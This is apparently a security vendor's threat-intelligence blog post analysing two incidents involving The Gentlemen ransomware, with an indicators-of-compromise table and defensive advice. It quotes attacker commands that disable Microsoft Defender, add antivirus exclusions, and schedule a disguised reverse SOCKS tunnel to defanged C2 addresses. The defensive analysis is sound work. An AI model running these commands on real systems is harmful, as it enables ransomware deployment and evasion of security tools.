Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportBlogContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR: Identity Threat Detection and Response

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed ITDR: Identity Threat Detection and Response

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training Software

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training Software

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    How Huntress Uses Managed SIEM to Detect Threats Faster
    Huntress Cybersecurity
    How Huntress Uses Managed SIEM to Detect Threats Faster
    Huntress Cybersecurity
    The Gentlemen (Ransomware) in Disguise: Defense Evasion and other TTPs
    Huntress Cybersecurity
    The Gentlemen (Ransomware) in Disguise: Defense Evasion and other TTPs
    Huntress Cybersecurity
    Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft
    Huntress Cybersecurity
    Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Blog
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportBlogContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
The Gentlemen (Ransomware) in Disguise: Defense Evasion and other TTPs
Published:
May 21, 2026

The Gentlemen (Ransomware) in Disguise: Defense Evasion and other TTPs

By:
Harlan Carvey
Lindsey O'Donnell-Welch
Share icon
Glitch effectGlitch effectGlitch effect

Key Takeaways

  • In April and May, Huntress investigated two incidents involving The Gentlemen, a ransomware-as-a-service (RaaS) operation that has reportedly been gaining traction since its launch in mid-2025

  • Both incidents included the use of Scheduled Tasks, PowerShell, and some defense evasion or impairment tactics: in both cases, the Security, System, and Application Event Logs were cleared, and PowerShell commands aimed to disable Microsoft Defender and add antivirus exclusions

  • A recent leak of The Gentlemen operation’s internal chats reveals several other ways its operators are targeting security gaps in organizations

Acknowledgments: Huntress wishes to recognize the contributions of SOC analysts Nick Roddy and Dani Lopez for their investigations and analysis into these incidents.


The Huntress SOC recently came across two incidents involving The Gentlemen ransomware, an operation that first emerged in mid-2025 and has been very active since then, with Ransomware.live showing claims of over 400 victims across at least 70 countries.

One intriguing aspect of previous The Gentlemen incidents is the defense evasion strategy used by threat actors that have deployed the ransomware. According to a Trend Micro report, threat actors have used custom-built defense evasion tools and capabilities to disable security solutions in The Gentlemen attacks. A more recent leak of the operation’s internal database, in early May, further revealed its operators relying on a group of tools dedicated to security tool evasion, and techniques for abusing Windows logging.

The Gentlemen is a RaaS operation, meaning that it can be distributed in attacks by affiliates, and as such, the observed attack chains will very often differ between attacks. Our investigation into the two incidents where The Gentlemen was deployed revealed several commonalities in TTPs, including the use of Scheduled Tasks and PowerShell. We did also see some basic defense evasion tactics: in both incidents, the Security, System, and Application Event Logs were cleared, although curiously other Windows Event Logs were untouched. The threat actors in these incidents also tried to evade antivirus solutions after their first attempt to deploy the encryptor was blocked.

Our insight into how attacks play out within impacted organizations themselves, combined with the leaked chat corpus revealing the under-the-hood operations of The Gentlemen, offer detailed insight for defenders trying to better understand the incidents linked back to this ransomware.


A not so gentlemen-ly ransomware

The industry is now learning more about The Gentlemen because an insider with access to their information leaked an internal database belonging to the operation in early May. The leak exposed several accounts, including one purportedly belonging to the group’s administrator, who runs the infrastructure and builds the ransomware’s locker and panel. The leak gave an inside look at how the operation works, including initial access vectors (such as edge appliances), CVEs the actors are tracking (including Fortinet authentication bypass flaw CVE-2024-55591), and how ransom negotiations play out.

Previous analysis of The Gentlemen ransomware samples by Check Point researchers has shown eight affiliate IDs tied back to the Tox messaging network that the operation was using  – including a Tox ID belonging to the administrator, which indicates that The Gentlemen administrator may also actively engage in some of the attacks, in addition to affiliates. 

Previous public reports have also pointed to various techniques used by threat actors deploying The Gentlemen ransomware, including the use of legitimate driver abuse, the leveraging of Group Policy Objects (GPO) to enable domain-wide attacks, and persistence via remote access software (specifically AnyDesk). 

Huntress SOC analysts observed two incidents where The Gentlemen ransomware was deployed in April and May. In both incidents, the Huntress agent was deployed post-incident, limiting our visibility into what happened. EDR telemetry from during the attack itself was not available, which could have given valuable insight into the malicious behavior that triggered detections. The impacted organizations did not have SIEM, further limiting data that could show specifics around initial access. However, based on further investigation into the available telemetry, including PowerShell and Windows Event Logs, we were able to gather breadcrumbs about how the attacks unfolded. 


A shipping and transportation org incident

On April 10, the Huntress agent was added to an organization in the shipping and transportation sector post-incident.

The first point of visibility we had for the Windows Event Logs started on April 9 and showed the threat actor initiating a Remote Desktop Protocol (RDP) connection using a compromised user’s account. This doesn’t necessarily mean that initial access was achieved via RDP; rather this is as far back as our visibility allowed us to see.

Shortly after the threat actor initiated and then established the RDP connection, they attempted to run the file encryptor (win.exe) locally from the Documents folder, as seen in the following command line:

C:\Users\REDACTED\Documents\win.exe --password REDACTED --T 200 --superfast

Windows Event Logs (specifically Microsoft Defender Event IDs 1116 and 1117) showed Microsoft Defender detecting and blocking this attempt. The logs also showed Defender detecting and blocking Trojan:Win32/MpTamperBulkExcl.H, a PowerShell script that was executed and attempted to tamper with antivirus exclusions.

The threat actor then created a series of Scheduled Tasks (likely on the Domain Controller, as we didn’t see the Event Log Microsoft-Windows-TaskScheduler/140 records that we would expect to see with tasks created locally on the endpoint). One of these was used to run the file encryptor again. 

On April 10, the attacker also cleared the System, Application, and Security Windows Event Logs. We get a clear forensic breadcrumb here through a series of Event Logs (specifically Event ID 104 for the Application and System Logs, and Event ID 1102 for the Security log, showing that all have been cleared). However, the threat actor only cleared these three logs, rather than all log files; meaning that there are still plenty of other footprints to investigate.  

We get some further information about the threat actor’s subsequent efforts to deploy the ransomware while looking at another source of forensic telemetry, the Managed Antivirus (MAV) detections linked to the attack, which fired off when the Huntress agent was installed.

Figure 1: View of Defender detection of malicious executable


These showed a second instance of the same win.exe ransomware payload detected on April 10, which was found on the NETLOGON share and executed by the SYSTEM account through the Configuration Manager Client (CcmExec.exe). As Figure 1 indicates (and Microsoft Defender Event ID 1118 within the logs validates), Microsoft Defender detected this but failed to execute the designated remediation.

After the payload was successfully deployed, files were encrypted with an extension .fjn1jw and the ransom note (README-GENTLEMEN.txt) was dropped.


May attack targets a construction company 

More recently, the Huntress agent was installed post-incident, on May 18, on three endpoints belonging to a construction company. The Huntress agent was not installed at the beginning of the attack, limiting our visibility into the initial access vector for the incident. However, Microsoft Defender logs illustrated malicious activity being detected as far back as April 22. 

The file encryption had also started days earlier before the Huntress agent was installed, on May 15. As seen in Figure 2, the threat actor’s first attempt to execute the encryptor was picked up by Microsoft Defender on that date as well (Ransom:Win64/Gentlemen.SH!MTB). 

A closer look at the Defender alert in Figure 2 shows several differences in this incident versus the one in April. Unlike the incident’s encryptor in April, this incident’s file encryption executable had a different name (G_hlm7jj_windows_amd64.exe). The threat actors also operated out of different directories; while the one in April first attempted to use the compromised user’s Documents folder, this more recent one used the Downloads folder.

Figure 2: Defender detection of the file encryptor executable


After their initial attempt to deploy the ransomware failed, the threat actor mixed things up, and we observed several defense evasion techniques. Several Windows Event Logs were cleared by the attacker - but several more remained intact. Those remaining logs, coupled with the PowerShell event logs, provided us an inside look at what happened.The threat actor used an extensive series of commands via PowerShell to disable Microsoft Defender, and then “blind” it with exclusions, before re-deploying the executable. A sample of those commands from the second incident appears as follows:

powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled

powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force

powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled -Force

powershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force

powershell -Command Add-MpPreference -ExclusionPath C:\ -Force  

The threat actor created Scheduled Tasks that were detected on impacted endpoints, which executed a malicious binary from the temp folder. The binary (svchost32.exe), disguised as the legitimate Windows system process svchost.exe, created a SOCKS proxy connection to a command-and-control (C2) IP address at 193.233.202[.]17 on port 44729. This Scheduled Task would persist remote access, using malware that would beacon to the C2 IP address:

C:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks

We also observed a command line from a previous attempt to create a malicious Scheduled Task at a different address, which appeared as follows:

cmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1

The Scheduled Task was set to launch every 2 minutes, and for all intents and purposes, after the first launch, one would expect the TaskScheduler Event Log to be full of TaskScheduler/332 events, indicating that the subsequent task could not launch because there was already a copy of the task running. This is a particularly noisy means of persistence, due to the event messages being generated every two minutes. However, on this incident, the logs were full of another sequence of events. Every two minutes a TaskScheduler/101 event would indicate that the task had been launched based on a trigger (in this case, a two minute timer), and would be followed by TaskScheduler/107 and TaskScheduler/203 event messagings, indicating that the task could not be launched. While the logs did not go back far enough to “see” the Scheduled Task being created and registered, there were indications of Scheduled Task, via the identified sequence of event messages, as far back as May 13. 

The series of messages appeared every two minutes as follows:

Microsoft-Windows-TaskScheduler/107;\WindowsConnSvc,{0091219c-aa1d-45ee-84eb-1d70f291f818}

Microsoft-Windows-TaskScheduler/101;\WindowsConnSvc,NT AUTHORITY\SYSTEM,2147942593

Microsoft-Windows-TaskScheduler/203;\WindowsConnSvc,{0091219c-aa1d-45ee-84eb-1d70f291f818},C:\Windows\Temp\svchost32.exe,2147942593

On another endpoint, after the Security Event Log had been cleared, session information derived from data from the subsequent three days until the Huntress agent was installed illustrated logins to the compromised user account, originating from the workstation WIN-8OA3CCQAE4D, which Huntress has observed associated with malicious activity going back almost two years. In fact, this workstation has also been identified by FalconFeeds as being associated with Qilin ransomware, and has been identified by Red Asgard as being part of Lazarus infrastructure. 


Defending against the gentlemen ransomware attacks

The Gentlemen has gained traction since emerging in mid-2025, and the recent leak of its internal database gave defenders an unusual look at how the group operates behind the scenes. Our own insight into incidents involving the ransomware show threat actors relying on Scheduled Tasks, PowerShell, and log clearing, while still leaving behind enough telemetry for defenders to piece together the intrusion and better understand the threat’s tradecraft. Some of the practical defense takeaways from these incidents include the need to: 

  • Enforce MFA, restrict RDP, and investigate unusual logons to high-value systems

  • Monitor Scheduled Task creation and repeated task failures for signs of persistence or ransomware execution

  • Enable Defender tamper protection and investigate any attempts to disable it or add exclusions

  • Treat clearing of Security, System, and Application logs as an immediate escalation trigger

As we mentioned in the recent May Tradecraft Tuesday episode about RaaS, defending against ransomware also often starts with securing the basics. That includes maintaining an asset inventory, reducing your attack surface, and deploying monitoring broadly.

Huntress has published indicators of compromise related to these incidents to our threat intelligence repository on Github.


IoCs 

Indicator

Description

WIN-8OA3CCQAE4D

Malicious workstation name (second incident)

193.233.202[.]17

C2 IP address for malicious Scheduled Task (second incident)

77.110.122[.]137

C2 IP address for malicious Scheduled Task (second incident)

G_hlm7jj_windows_amd64.exe


SHA256: f918535f974591ef031bd0f30a8171e3da27a6754e6426a8ba095f83195661c8

Encryptor (second incident)

win.exe

Command line:
C:\Users\[redacted]\Documents\win.exe --password [redacted] --T 200 --superfast

Encryptor (first incident)

README-GENTLEMEN.txt

Ransom note (first and second incident)

Trojan:Win32/MpTamperBulkExcl.H

Defender detection of PowerShell script tampering with antivirus exclusions

Ransom:Win64/Gentlemen.SH!MTB

Defender detection of Gentlemen ransomware

Ransom:Win64/BlackByte.SZ!MTB

Defender detection of win.exe





Categories
Cybersecurity Education
ChatGPT logoChatGPTOpens in new tabClaude logoClaudeOpens in new tabPerplexity logoPerplexityOpens in new tabGoogle Gemini logoGoogle AIOpens in new tab
AI sparkle iconSummarize This Page
ChatGPT logoChatGPTOpens in new tabClaude logoClaudeOpens in new tabPerplexity logoPerplexityOpens in new tabGoogle Gemini logoGoogle AIOpens in new tab

See Huntress in action

Our platform combines a suite of powerful managed detection and response tools for endpoints and Microsoft 365 identities, science-backed security awareness training, and the expertise of our 24/7 Security Operations Center (SOC).

Book a Demo
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Protect Yourself from Political Donation Scams

    Don’t let fraud disrupt your civic duty. Learn how to spot and avoid political donation scams that target voters through robocalls, fake websites, and deepfakes.
  • What is Behavioral Analysis in Cybersecurity?

    Behavioral analysis is one of the most powerful ways to hunt down attackers. However, it’s a somewhat misunderstood element—it’s the human element that catches what AI and systems miss. Let’s uncover it and figure out where and how it fits in.
  • Unwanted Access: Protecting Against the Growing Threat of Session Hijacking and Credential Theft

    Discover how our new Unwanted Access capability strengthens your defenses against session hijacking and credential theft. Dive in and learn how to minimize risks and protect your business-critical assets from evolving cyber threats.
  • Oh, Auth 2.0! Device Code Phishing in Google Cloud and Azure

    All OAuth 2.0 implementations are equal. Some are just more equal than others. This blog covers device code phishing and compares OAuth implementations between Google and Azure. Does OAuth implementation impact the efficacy of hacker tradecraft? Find out here!
  • The Battle for macOS Management: MDM vs. RMM

    Explore the two primary methods for managing macOS devices, MDM (Mobile Device Management) and RMM (Remote Monitoring and Management).
  • PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182

    Huntress is seeing threat actors exploit React2Shell (CVE-2025-55182) to deploy a Linux backdoor, a reverse proxy tunnel, and a Go-based post-exploitation implant.
  • Rapid Response: TrickBoot

    TrickBot has unleashed yet another module in its growing arsenal specifically targeting firmware vulnerabilities, named TrickBoot.
  • Boring Isn’t Harmless: The Risks Behind Common Cyberattack Tradecraft

    Don’t underestimate basic attacker tradecraft tactics. Learn how common cybersecurity tradecraft succeeds and get practical tips from the Huntress SOC to shut it down.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 250k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy